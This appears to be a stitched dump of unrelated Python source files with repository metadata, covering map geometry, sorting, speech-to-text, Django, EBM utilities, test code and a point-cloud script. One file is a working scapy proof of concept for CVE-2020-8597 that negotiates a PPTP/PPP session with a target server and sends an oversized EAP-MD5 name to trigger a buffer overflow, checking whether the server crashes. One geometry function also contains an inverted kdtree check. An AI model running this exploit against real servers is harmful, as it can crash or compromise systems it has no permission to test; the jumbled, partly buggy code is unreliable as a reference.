new_curve = Curve(id=len(open_map.curves)+1, pts=new_pts)
open_map.curves[new_curve.id] = new_curve
# open_map.curves[curve.id] = curve
return curve.id, new_curve.id
def ProjectToPolyLine(polyline,pt,kdtree=None):
"""
projects a point to a polyline
"""
# First find the closest point on the curve
if kdtree is not None:
idx = np.argmin(np.sum((polyline.pts.T - pt)**2,axis=1))
else:
dist, idx = kdtree.query(pt)
# determine the interval in which the point lies
if idx == 0:
idx1 = idx
idx2 = idx + 1
elif idx == polyline.pts.shape[-1] - 1:
idx2 = idx
idx1 = idx - 1
else:
base_pt = polyline.pts[:,idx-1]
base_vec = polyline.pts[:,idx] - base_pt
vec = pt - base_pt
ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
if ratio > 0.0:
if ratio < 1.0:
idx1 = idx - 1
idx2 = idx
else:
idx1 = idx
idx2 = idx + 1
else:
idx1 = idx - 1
idx2 = idx
base_pt = polyline.pts[:,idx1]
base_vec = polyline.pts[:,idx2] - base_pt
vec = pt - base_pt
ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
sign = -np.sign(np.cross(vec.T,base_vec.T))
normal = sign*np.linalg.norm(vec - base_vec * ratio)
return idx1, ratio, normal
def ProjectToCurve(curve,pt,kdtree=None):
"""
projects a point to a curve (i.e. an array of curve pts)
"""
# First find the closest point on the curve
# import pdb; pdb.set_trace()
if kdtree is not None:
dist, idx = kdtree.query(np.array([pt.x, pt.y]))
else:
dists = np.array([(p.x - pt.x)**2 + (p.y - pt.y)**2 for p in curve.pts])
idx = np.argmin(dists)
dist = dists[idx]
# determine the interval in which the point lies
if idx == 0:
idx1 = idx
idx2 = idx + 1
elif idx == len(curve.pts) - 1:
idx2 = idx
idx1 = idx - 1
else:
# Choose interval based on heading of curve point
if np.dot(np.array([np.cos(curve.pts[idx].theta), np.sin(curve.pts[idx].theta)]),
CurvePtToVector(pt)[:2] - CurvePtToVector(curve.pts[idx])[:2]) < 0:
idx2 = idx
idx1 = idx - 1
else:
idx1 = idx
idx2 = idx + 1
# Compute the curve index
base_vec = CurvePtToVector(curve.pts[idx2] - curve.pts[idx1])[:2]
vec = CurvePtToVector(pt - curve.pts[idx1])[:2]
ratio = np.dot(vec,base_vec) / np.dot(base_vec,base_vec)
sign = -np.sign(np.cross(vec.T,base_vec.T))
normal = sign*np.linalg.norm(vec - base_vec * ratio)
return idx1, ratio, normal
def ConnectLanes(open_map, from_id, to_id, connection_type):
for connection_id, connection in open_map.lane_connections.items():
if connection.from_id == from_id and connection.to_id == to_id:
return None
connection = LaneConnection(
id = len(open_map.lane_connections) + 1,
from_id=from_id,
to_id=to_id,
connection_type=connection_type
)
open_map.lane_connections[connection.id] = connection
# if from_id in open_map.lane_segment.keys():
# open_map.lane_segments[from_id].lane_connections.add(connection.id)
return connection
def SplitLane(open_map, segment_id, lane_id, curve_idx):
lane = open_map.lane_segments[lane_id]
segment = open_map.road_segments[segment_id]
if lane_id in segment.lanes:
new_lane = LaneSegment(
id = len(open_map.lane_segments)+1,
segment_id = segment_id,
lane_connections = set()
)
new_lane = NewLaneSegment(open_map)
for connection_id, connection in open_map.lane_connections.items():
if connection.from_id == lane_id and connection.connection_type == "Continue":
connection.from_id = new_lane.id
# lane_connection = LaneConnection(
# id=len(open_map.lane_connections)+1,
# from_id=lane.id,
# to_id=new_lane.id,
# connection_type="Continue"
# )
open_map.lane_segments[new_lane.id] = new_lane
connection = ConnectLanes(open_map,lane.id,new_lane.id,"Continue")
if connection is not None:
new_lane.lane_connections.add(connection.id)
lane.lane_connections.add(connection.id)
# open_map.lane_connections[connection_id] = lane_connection
segment.lanes.remove(lane.id)
segment.lanes.append(new_lane.id)
old_id, new_id = SplitSplineCurve(open_map, lane.centerline, curve_idx.i, curve_idx.t)
new_lane.centerline = new_id
def SplitBoundary(open_map, segment_id, boundary_id, curve_idx):
boundary = open_map.boundaries[boundary_id]
segment = open_map.road_segments[segment_id]
if boundary_id in segment.boundaries:
# new_boundary = Boundary(
# id = len(open_map.boundaries)+1,
# boundary_type = boundary.boundary_type
# )
# open_map.boundaries[new_boundary.id] = new_boundary
old_id, new_id = SplitSplineCurve(open_map, boundary.curve, curve_idx.i, curve_idx.t)
new_boundary = NewBoundary(open_map,
boundary_type=boundary.boundary_type,curve_id=new_id)
# new_boundary.curve = new_id
segment.boundaries.remove(boundary.id)
segment.boundaries.add(new_boundary.id)
def SplitRefLine(open_map, segment_id, curve_idx):
segment = open_map.road_segments[segment_id]
old_id, new_id = SplitSplineCurve(open_map, segment.refline, curve_idx.i, curve_idx.t)
segment.refline = new_id
| 7,783
| -5
| 424
|
eace333492baab89237ac78a14843235cda31067
| 316
|
py
|
Python
|
lab_session/selection_sort.py
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
[
"MIT"
] | 1
|
2021-05-13T13:10:42.000Z
|
2021-05-13T13:10:42.000Z
|
lab_session/selection_sort.py
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
[
"MIT"
] | null | null | null |
lab_session/selection_sort.py
|
sowmyamanojna/BT3051-Data-Structures-and-Algorithms
|
09c17e42c2e173a6ab10339f08fbc1505db8ea56
|
[
"MIT"
] | null | null | null |
values = [6, 5, 3, 1, 8, 7, 2, 4]
print (values)
values = selection_sort(values)
| 18.588235
| 46
| 0.594937
|
def selection_sort(value):
n = len(value)
for i in range(n-1):
loc = i
for j in range(i+1, n):
if value[j] < value[loc]:
loc = j
if loc != i:
value[i], value[loc] = value[loc], value[i]
print(value)
return value
values = [6, 5, 3, 1, 8, 7, 2, 4]
print (values)
values = selection_sort(values)
| 212
| 0
| 22
|
46b5d19814074de733b953d95c57c5868b1bb95b
| 7,026
|
py
|
Python
|
cve-2020-8597-pptpd/pptp_poc.py
|
reidmefirst/PoC-Exploits
|
3b8f845774a9a6474fed86264443779a8f85e71a
|
[
"BSD-3-Clause"
] | 3
|
2020-06-02T14:39:17.000Z
|
2021-04-23T16:34:08.000Z
|
cve-2020-8597-pptpd/pptp_poc.py
|
reidmefirst/PoC-Exploits
|
3b8f845774a9a6474fed86264443779a8f85e71a
|
[
"BSD-3-Clause"
] | null | null | null |
cve-2020-8597-pptpd/pptp_poc.py
|
reidmefirst/PoC-Exploits
|
3b8f845774a9a6474fed86264443779a8f85e71a
|
[
"BSD-3-Clause"
] | 1
|
2020-06-12T17:39:21.000Z
|
2020-06-12T17:39:21.000Z
|
#!/usr/bin/python3
from scapy.all import *
import socket
import sys
import signal
import os
conf_ack_received = False
conf_ack_sent = False
debug = False
if os.environ.get("DEBUG"):
debug = True
if len(sys.argv) < 2:
print("Usage %s PPTP_Server to test for CVE-2020-8597" %(sys.argv[0]));
sys.exit(0)
dst = sys.argv[1]
#default pptp port
dport = 1723
print("Initiating communications with PPTP server %s " %(dst))
signal.signal(signal.SIGALRM, handler)
#6 seconds for first TCP response
signal.alarm(6)
#TCP communications
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((dst, dport))
cstream = StreamSocket(client)
# initialize PPTP session
call_id = random.randint(1000,10000)
vr=PPTPStartControlConnectionRequest(vendor_string="cananian")
#This is due to a bug in PPTPStartControlConnectionRequest in scapy where version and
#revision is not properly parsed
vr.protocol_version=256
cstream.sr1(vr,verbose=debug)
call_reply = cstream.sr1(PPTPOutgoingCallRequest(call_id=call_id),verbose=debug)
call_reply = PPTPOutgoingCallReply(call_reply)
signal.alarm(0)
#Another 6 seconds to do GRE connection
signal.alarm(6)
# GRE communications
gre_socket = socket.socket(socket.AF_INET,socket.SOCK_RAW, socket.IPPROTO_GRE)
gre_socket.connect((dst,dport))
gre_stream = SimpleSocket(gre_socket)
#send configuration request
server_conf_request = gre_stream.sr1(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id)/
HDLC()/PPP()/
PPP_LCP_Configure(id=0x1,options=[
PPP_LCP_Magic_Number_Option(magic_number=0xaabbccdd) ]),verbose=debug)
server_conf_request = IP(server_conf_request)
signal.alarm(0)
# give 9 seconds for configure ack to complete
signal.alarm(9)
tries = 0
try:
while conf_ack_received == False or tries < 9:
sniff(iface="eth0",prn=pkt_callback,count=1,filter='proto gre and src host '+sys.argv[1],store=0)
tries = tries + 1
except:
if debug:
print("Never could recevie a configureation ack from peer due to Timeout")
tries = 9
if conf_ack_received == False and tries > 8:
print("Remote system %s did not provide Configure-Acknowledgement - giving up" %(sys.argv[1]))
print("Server %s is in UNKNOWN state" %(sys.argv[1]))
sys.exit(0)
signal.alarm(0)
print("Connected to PPTP server, now sending large buffer to peer to attempt buffer overflow")
bad_pkt=GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+1)/PPP(proto=0xc227)/EAP_MD5(code=1,value_size=16,value='A'*16, optional_name='A'*1100)
gre_stream.send(bad_pkt)
#Look to see if we receive EAP_Nak that means buffer overflow did NOT succeed
signal.alarm(3)
try:
sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Server %s is likely vulnerable, did not return anything after EAP packet " % (sys.argv[1]))
sys.exit(0)
print("Server %s is likely NOT vulnerable to buffer overflow" % (sys.argv[1]))
signal.alarm(0)
print("Verifying peer %s one more time using a Echo request to the peer " % (sys.argv[1]))
signal.alarm(3)
#echo request to test if PPP interface is still alive - that means we didnt crash the remote
#pptp server with the bad payload
gre_stream.send(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+2)/
HDLC()/PPP()/
PPP_LCP_Configure(code=0x9,id=4))
try:
PPP_Alive = sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Did not received PPP Echo Reply, check the logs on the server to verify status")
sys.exit(0)
print("Received a normal PPP Echo Reply, System is mostly likely NOT vulnerable")
sys.exit(0)
| 42.325301
| 212
| 0.609735
|
#!/usr/bin/python3
from scapy.all import *
import socket
import sys
import signal
import os
conf_ack_received = False
conf_ack_sent = False
debug = False
if os.environ.get("DEBUG"):
debug = True
def pkt_callback(pkt):
global gre_stream, server_conf_request, call_reply, conf_ack_received, conf_ack_sent, debug
if debug:
print("Received a GRE packet that shows continued conversation for EAP")
pkt.show()
if pkt.haslayer(PPP):
if pkt.getlayer(PPP).proto == 49699 : # CHAP 0xc223
conf_ack_received = True
if debug:
print("Received a CHAP challenge from peer ignoring")
print("Assuming we received a Conf-Ack already")
return
if pkt.haslayer(EAP):
if pkt.getlayer(EAP).code == 2 :
#EAP Response received for the sent EAP request with bad payload
if pkt.getlayer(EAP).type == 3: # If EAP-NaK recevied assume server is ok
print("Server %s is likely NOT vulnerable " % (sys.argv[1]))
sys.exit(0)
if pkt.haslayer(PPP_LCP_Configure) :
p_layer = pkt.getlayer(PPP_LCP_Configure)
cid = p_layer.id
if p_layer.code == 2:
if debug:
print("Received Conf ack we are all okay")
conf_ack_received = True
if conf_ack_sent == True:
return
else:
sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
if p_layer.code == 1: #config request
if debug:
print("Received another Config-Request, should reply this")
pkt.show()
server_conf_ack = gre_stream.sr1(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+1)/
HDLC()/PPP()/
PPP_LCP_Configure(code=0x2,id=cid,options=pkt[IP][GRE_PPTP][PPP][PPP_LCP_Configure].options), verbose=debug)
conf_ack_sent = True
if conf_ack_received:
sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
if p_layer.code == 10 and p_layer.id == 4: # Echo-reply with id=1
if debug:
print("We received a Echo-Reply back for ID=4 ping request")
print("Server %s is likely NOT vulnerable " % (sys.argv[1]))
sys.exit(0)
def handler(signum, frame):
if debug:
print("Timeout has expired")
raise Exception('Timed out')
if len(sys.argv) < 2:
print("Usage %s PPTP_Server to test for CVE-2020-8597" %(sys.argv[0]));
sys.exit(0)
dst = sys.argv[1]
#default pptp port
dport = 1723
print("Initiating communications with PPTP server %s " %(dst))
signal.signal(signal.SIGALRM, handler)
#6 seconds for first TCP response
signal.alarm(6)
#TCP communications
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((dst, dport))
cstream = StreamSocket(client)
# initialize PPTP session
call_id = random.randint(1000,10000)
vr=PPTPStartControlConnectionRequest(vendor_string="cananian")
#This is due to a bug in PPTPStartControlConnectionRequest in scapy where version and
#revision is not properly parsed
vr.protocol_version=256
cstream.sr1(vr,verbose=debug)
call_reply = cstream.sr1(PPTPOutgoingCallRequest(call_id=call_id),verbose=debug)
call_reply = PPTPOutgoingCallReply(call_reply)
signal.alarm(0)
#Another 6 seconds to do GRE connection
signal.alarm(6)
# GRE communications
gre_socket = socket.socket(socket.AF_INET,socket.SOCK_RAW, socket.IPPROTO_GRE)
gre_socket.connect((dst,dport))
gre_stream = SimpleSocket(gre_socket)
#send configuration request
server_conf_request = gre_stream.sr1(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id)/
HDLC()/PPP()/
PPP_LCP_Configure(id=0x1,options=[
PPP_LCP_Magic_Number_Option(magic_number=0xaabbccdd) ]),verbose=debug)
server_conf_request = IP(server_conf_request)
signal.alarm(0)
# give 9 seconds for configure ack to complete
signal.alarm(9)
tries = 0
try:
while conf_ack_received == False or tries < 9:
sniff(iface="eth0",prn=pkt_callback,count=1,filter='proto gre and src host '+sys.argv[1],store=0)
tries = tries + 1
except:
if debug:
print("Never could recevie a configureation ack from peer due to Timeout")
tries = 9
if conf_ack_received == False and tries > 8:
print("Remote system %s did not provide Configure-Acknowledgement - giving up" %(sys.argv[1]))
print("Server %s is in UNKNOWN state" %(sys.argv[1]))
sys.exit(0)
signal.alarm(0)
print("Connected to PPTP server, now sending large buffer to peer to attempt buffer overflow")
bad_pkt=GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+1)/PPP(proto=0xc227)/EAP_MD5(code=1,value_size=16,value='A'*16, optional_name='A'*1100)
gre_stream.send(bad_pkt)
#Look to see if we receive EAP_Nak that means buffer overflow did NOT succeed
signal.alarm(3)
try:
sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Server %s is likely vulnerable, did not return anything after EAP packet " % (sys.argv[1]))
sys.exit(0)
print("Server %s is likely NOT vulnerable to buffer overflow" % (sys.argv[1]))
signal.alarm(0)
print("Verifying peer %s one more time using a Echo request to the peer " % (sys.argv[1]))
signal.alarm(3)
#echo request to test if PPP interface is still alive - that means we didnt crash the remote
#pptp server with the bad payload
gre_stream.send(GRE_PPTP(seqnum_present=1,call_id=call_reply.call_id,seqence_number=server_conf_request[IP][GRE_PPTP].seqence_number+2)/
HDLC()/PPP()/
PPP_LCP_Configure(code=0x9,id=4))
try:
PPP_Alive = sniff(iface="eth0", count=1, prn=pkt_callback, filter='proto gre and src host '+sys.argv[1], store=0)
except:
print("Did not received PPP Echo Reply, check the logs on the server to verify status")
sys.exit(0)
print("Received a normal PPP Echo Reply, System is mostly likely NOT vulnerable")
sys.exit(0)
| 3,009
| 0
| 70
|
b7423732828a1ec172d11cc4ed16d8387b7ac8e6
| 676
|
py
|
Python
|
speech_to_text.py
|
TheMatildaProject/auditory-cortex
|
72edf7e90fad238ce3705f0ce8307ce946fc50c1
|
[
"MIT"
] | null | null | null |
speech_to_text.py
|
TheMatildaProject/auditory-cortex
|
72edf7e90fad238ce3705f0ce8307ce946fc50c1
|
[
"MIT"
] | null | null | null |
speech_to_text.py
|
TheMatildaProject/auditory-cortex
|
72edf7e90fad238ce3705f0ce8307ce946fc50c1
|
[
"MIT"
] | null | null | null |
#import speech_recognition as sr
import wave
import io
import io, os
from google.auth import environment_vars
from google.cloud import speech
| 28.166667
| 51
| 0.64497
|
#import speech_recognition as sr
import wave
import io
import io, os
from google.auth import environment_vars
from google.cloud import speech
class SpeechToText(object):
def __init__(self, audio):
self._audio = audio
self._speech_client = speech.Client()
def getFromGoogle(self):
with io.BytesIO(self._audio) as audio_file:
content = audio_file.read()
sample = self._speech_client.sample(
content,
source_uri=None,
encoding='LINEAR16')
alternatives = sample.recognize('en-UK')
for alternative in alternatives:
return alternative.transcript
| 452
| 6
| 77
|
a851d9c85ce569c52aa4249c5fc22470cd0186ca
| 559
|
py
|
Python
|
cafeapp/migrations/0019_auto_20211208_1241.py
|
giranezafiacre/fabcafe-api
|
d4cd3e6b291c5b071c8c70c5deaac06f0182a664
|
[
"MIT"
] | null | null | null |
cafeapp/migrations/0019_auto_20211208_1241.py
|
giranezafiacre/fabcafe-api
|
d4cd3e6b291c5b071c8c70c5deaac06f0182a664
|
[
"MIT"
] | null | null | null |
cafeapp/migrations/0019_auto_20211208_1241.py
|
giranezafiacre/fabcafe-api
|
d4cd3e6b291c5b071c8c70c5deaac06f0182a664
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-12-08 10:41
import datetime
from django.db import migrations, models
| 23.291667
| 99
| 0.592129
|
# Generated by Django 3.2.9 on 2021-12-08 10:41
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cafeapp', '0018_auto_20211208_1228'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='email',
),
migrations.AlterField(
model_name='order',
name='order_time_date',
field=models.DateTimeField(default=datetime.datetime(2021, 12, 8, 12, 41, 23, 362870)),
),
]
| 0
| 429
| 23
|
b95fa9041a7cb8d7c72117a7a576a5a8c358e96d
| 4,006
|
py
|
Python
|
src/python/interpret/glassbox/ebm/utils.py
|
benediktwagner/interpret
|
a80e42fbaad7c25f4447b6f81137c53714eed710
|
[
"MIT"
] | 2
|
2019-05-19T04:48:52.000Z
|
2019-05-25T14:50:48.000Z
|
src/python/interpret/glassbox/ebm/utils.py
|
benediktwagner/interpret
|
a80e42fbaad7c25f4447b6f81137c53714eed710
|
[
"MIT"
] | null | null | null |
src/python/interpret/glassbox/ebm/utils.py
|
benediktwagner/interpret
|
a80e42fbaad7c25f4447b6f81137c53714eed710
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
# TODO: Test EBMUtils
from sklearn.utils.extmath import softmax
import numpy as np
import logging
log = logging.getLogger(__name__)
# TODO: Clean up
| 32.306452
| 84
| 0.628308
|
# Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
# TODO: Test EBMUtils
from sklearn.utils.extmath import softmax
import numpy as np
import logging
log = logging.getLogger(__name__)
# TODO: Clean up
class EBMUtils:
@staticmethod
def gen_attributes(col_types, col_n_bins):
# Create Python form of attributes
# Undocumented.
attributes = [None] * len(col_types)
for col_idx, _ in enumerate(attributes):
attributes[col_idx] = {
# NOTE: Ordinal only handled at native, override.
# 'type': col_types[col_idx],
"type": "continuous",
# NOTE: Missing not implemented at native, always set to false.
"has_missing": False,
"n_bins": col_n_bins[col_idx],
}
return attributes
@staticmethod
def gen_attribute_sets(attribute_indices):
attribute_sets = [None] * len(attribute_indices)
for i, indices in enumerate(attribute_indices):
attribute_set = {"n_attributes": len(indices), "attributes": indices}
attribute_sets[i] = attribute_set
return attribute_sets
@staticmethod
def scores_by_attrib_set(
X, attribute_sets, attribute_set_models, skip_attr_set_idxs=[]
):
for set_idx, attribute_set in enumerate(attribute_sets):
if set_idx in skip_attr_set_idxs:
continue
tensor = attribute_set_models[set_idx]
# Get the current column(s) to process
attr_idxs = attribute_set["attributes"]
sliced_X = X[:, attr_idxs]
scores = tensor[tuple(sliced_X.T)]
yield set_idx, attribute_set, scores
@staticmethod
def decision_function(
X, attribute_sets, attribute_set_models, intercept, skip_attr_set_idxs=[]
):
if X.ndim == 1:
X = X.reshape(1, X.shape[0])
# Foreach column, add log odds per instance
score_vector = np.zeros(X.shape[0])
score_vector += intercept
scores_gen = EBMUtils.scores_by_attrib_set(
X, attribute_sets, attribute_set_models, skip_attr_set_idxs
)
for _, _, scores in scores_gen:
score_vector += scores
if not np.all(np.isfinite(score_vector)): # pragma: no cover
msg = "Non-finite values present in log odds vector."
log.error(msg)
raise Exception(msg)
return score_vector
@staticmethod
def classifier_predict_proba(X, estimator, skip_attr_set_idxs=[]):
log_odds_vector = EBMUtils.decision_function(
X,
estimator.attribute_sets_,
estimator.attribute_set_models_,
estimator.intercept_,
skip_attr_set_idxs,
)
log_odds_trans = np.c_[-log_odds_vector, log_odds_vector]
scores = softmax(log_odds_trans, copy=True)
return scores
@staticmethod
def classifier_predict(X, estimator, skip_attr_set_idxs=[]):
scores = EBMUtils.classifier_predict_proba(X, estimator, skip_attr_set_idxs)
return estimator.classes_[np.argmax(scores, axis=1)]
@staticmethod
def regressor_predict(X, estimator, skip_attr_set_idxs=[]):
scores = EBMUtils.decision_function(
X,
estimator.attribute_sets_,
estimator.attribute_set_models_,
estimator.intercept_,
skip_attr_set_idxs,
)
return scores
@staticmethod
def gen_feature_name(attr_idxs, col_names):
feature_name = []
for attribute_index in attr_idxs:
feature_name.append(col_names[attribute_index])
feature_name = " x ".join(feature_name)
return feature_name
@staticmethod
def gen_feature_type(attr_idxs, col_types):
if len(attr_idxs) == 1:
return col_types[attr_idxs[0]]
else:
return "pairwise"
| 3,344
| 398
| 22
|
c980129dfcca46c379ea366aa1fa15eee1b01ac4
| 187
|
py
|
Python
|
rdm/project_management/__init__.py
|
dheater/rdm
|
3e16b808cdcaa7860767fe99cd66997adc803c35
|
[
"MIT"
] | 76
|
2018-05-09T09:53:18.000Z
|
2022-03-21T11:55:18.000Z
|
rdm/project_management/__init__.py
|
dheater/rdm
|
3e16b808cdcaa7860767fe99cd66997adc803c35
|
[
"MIT"
] | 68
|
2018-03-24T10:03:09.000Z
|
2022-01-19T20:52:36.000Z
|
rdm/project_management/__init__.py
|
dheater/rdm
|
3e16b808cdcaa7860767fe99cd66997adc803c35
|
[
"MIT"
] | 24
|
2018-06-21T19:52:58.000Z
|
2022-03-29T13:15:15.000Z
|
from .base import BaseBackend
from .github import GitHubIssueBackend, GitHubPullRequestBackend
__all__ = [
'BaseBackend',
'GitHubIssueBackend',
'GitHubPullRequestBackend',
]
| 20.777778
| 64
| 0.764706
|
from .base import BaseBackend
from .github import GitHubIssueBackend, GitHubPullRequestBackend
__all__ = [
'BaseBackend',
'GitHubIssueBackend',
'GitHubPullRequestBackend',
]
| 0
| 0
| 0
|
311d97d31b1653b39c0e6b386a057ec53766cdaa
| 6,030
|
py
|
Python
|
tests/executor/test_mysos_task_runner.py
|
programwithebay/ApacheMysos
|
f4f7e459a51e957eeeef989b3ecdaac29393fa45
|
[
"Apache-2.0"
] | 1
|
2017-02-15T05:37:59.000Z
|
2017-02-15T05:37:59.000Z
|
tests/executor/test_mysos_task_runner.py
|
benley/mysos
|
9c19f28eb7926002005e276ef8cabf24c7fe2edd
|
[
"Apache-2.0"
] | null | null | null |
tests/executor/test_mysos_task_runner.py
|
benley/mysos
|
9c19f28eb7926002005e276ef8cabf24c7fe2edd
|
[
"Apache-2.0"
] | null | null | null |
import os
import signal
import unittest
from mysos.common.cluster import ClusterManager
from mysos.common.testing import Fake
from mysos.executor.noop_installer import NoopPackageInstaller
from mysos.executor.mysos_task_runner import MysosTaskRunner
from mysos.executor.task_runner import TaskError
from mysos.executor.testing.fake import FakeTaskControl
from kazoo.handlers.threading import SequentialThreadingHandler
import pytest
from twitter.common.concurrent import deadline
from twitter.common.quantity import Amount, Time
from twitter.common.zookeeper.serverset.endpoint import Endpoint, ServiceInstance
from zake.fake_client import FakeClient
from zake.fake_storage import FakeStorage
if 'MYSOS_DEBUG' in os.environ:
from twitter.common import log
from twitter.common.log.options import LogOptions
LogOptions.set_stderr_log_level('google:DEBUG')
LogOptions.set_simple(True)
log.init('mysos_tests')
| 28.990385
| 89
| 0.702819
|
import os
import signal
import unittest
from mysos.common.cluster import ClusterManager
from mysos.common.testing import Fake
from mysos.executor.noop_installer import NoopPackageInstaller
from mysos.executor.mysos_task_runner import MysosTaskRunner
from mysos.executor.task_runner import TaskError
from mysos.executor.testing.fake import FakeTaskControl
from kazoo.handlers.threading import SequentialThreadingHandler
import pytest
from twitter.common.concurrent import deadline
from twitter.common.quantity import Amount, Time
from twitter.common.zookeeper.serverset.endpoint import Endpoint, ServiceInstance
from zake.fake_client import FakeClient
from zake.fake_storage import FakeStorage
if 'MYSOS_DEBUG' in os.environ:
from twitter.common import log
from twitter.common.log.options import LogOptions
LogOptions.set_stderr_log_level('google:DEBUG')
LogOptions.set_simple(True)
log.init('mysos_tests')
class FakeStateManager(Fake): pass
class TestTaskRunner(unittest.TestCase):
def setUp(self):
self._storage = FakeStorage(SequentialThreadingHandler())
self._client = FakeClient(storage=self._storage)
self._client.start()
self._self_instance = ServiceInstance(Endpoint("host", 10000))
self._state_manager = FakeStateManager()
def tearDown(self):
self._client.stop()
def test_stop(self):
task_control = FakeTaskControl()
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
runner.start()
assert runner.stop()
# Killed by SIGTERM.
assert deadline(runner.join, Amount(1, Time.SECONDS)) == -signal.SIGTERM
def test_demote(self):
task_control = FakeTaskControl()
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
manager = ClusterManager(self._client, "/home/test/my_cluster")
runner.start()
self_member = manager.add_member(self._self_instance)
# 'self_instance' becomes the master.
manager.promote_member(self_member)
runner.promoted.wait(1)
another_member = manager.add_member(ServiceInstance(Endpoint("another_host", 10000)))
# This demotes 'self_instance', which should cause runner to stop.
manager.promote_member(another_member)
assert deadline(runner.join, Amount(1, Time.SECONDS))
def test_reparent(self):
task_control = FakeTaskControl()
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
manager = ClusterManager(self._client, "/home/test/my_cluster")
runner.start()
# Promote another instance.
master = ServiceInstance(Endpoint("another_host", 10000))
another_member = manager.add_member(master)
manager.promote_member(another_member)
assert runner.master.get(True, 1) == master
assert runner.stop()
assert deadline(runner.join, Amount(1, Time.SECONDS))
def test_mysqld_error(self):
task_control = FakeTaskControl(mysqld="exit 123")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
runner.start()
assert deadline(runner.join, Amount(1, Time.SECONDS)) == 123
def test_start_command_error(self):
task_control = FakeTaskControl(start_cmd="exit 1")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
with pytest.raises(TaskError) as e:
runner.start()
assert e.value.message.startswith("Failed to start MySQL task")
def test_promote_command_error(self):
task_control = FakeTaskControl(promote_cmd="exit 1")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
manager = ClusterManager(self._client, "/home/test/my_cluster")
runner.start()
self_member = manager.add_member(self._self_instance)
# 'self_instance' becomes the master.
manager.promote_member(self_member)
runner.promoted.wait(1)
with pytest.raises(TaskError) as e:
runner.join()
assert e.value.message.startswith("Failed to promote the slave")
def test_get_log_position(self):
task_control = FakeTaskControl(position=1)
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
runner.start()
assert runner.get_log_position() == 1
def test_get_log_position_error(self):
task_control = FakeTaskControl(get_log_position_cmd="exit 1")
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
with pytest.raises(TaskError) as e:
runner.get_log_position()
assert (e.value.message ==
"Unable to get the slave's log position: " +
"Command 'exit 1' returned non-zero exit status 1")
def test_stop_interminable(self):
cmd = """trap "echo Trapped SIGTERM!" TERM
while :
do
sleep 60
done
"""
task_control = FakeTaskControl(mysqld=cmd)
runner = MysosTaskRunner(
self._self_instance,
self._client,
"/home/test/my_cluster",
NoopPackageInstaller(),
task_control,
self._state_manager)
task_control._mysqld = cmd
runner.start()
assert runner.stop(timeout=1)
assert deadline(runner.join, Amount(1, Time.SECONDS)) == -signal.SIGKILL
| 4,756
| 32
| 320
|
a19e61972ecebe175f1b7437fdeac191ee97b06e
| 8,437
|
py
|
Python
|
scripts/object_recognition.py
|
SerenaXue/3D-Perception-Target-Identification
|
df1dfa8a2132c6fa90a9e8def636b65d9344ba9d
|
[
"MIT"
] | null | null | null |
scripts/object_recognition.py
|
SerenaXue/3D-Perception-Target-Identification
|
df1dfa8a2132c6fa90a9e8def636b65d9344ba9d
|
[
"MIT"
] | null | null | null |
scripts/object_recognition.py
|
SerenaXue/3D-Perception-Target-Identification
|
df1dfa8a2132c6fa90a9e8def636b65d9344ba9d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import numpy as np
import sklearn
from sklearn.preprocessing import LabelEncoder
import pickle
from sensor_stick.srv import GetNormals
from sensor_stick.features import compute_color_histograms
from sensor_stick.features import compute_normal_histograms
from visualization_msgs.msg import Marker
from sensor_stick.marker_tools import *
from sensor_stick.msg import DetectedObjectsArray
from sensor_stick.msg import DetectedObject
from sensor_stick.pcl_helper import *
# Voxel Grid filter
# PassThrough filter
# RANSAC plane segmentation
# Extract inliers/outliers
# Outlier Removal Filter
# Euclidean Clustering (perform a DBSCAN cluster search)
# Callback function for your Point Cloud Subscriber
if __name__ == '__main__':
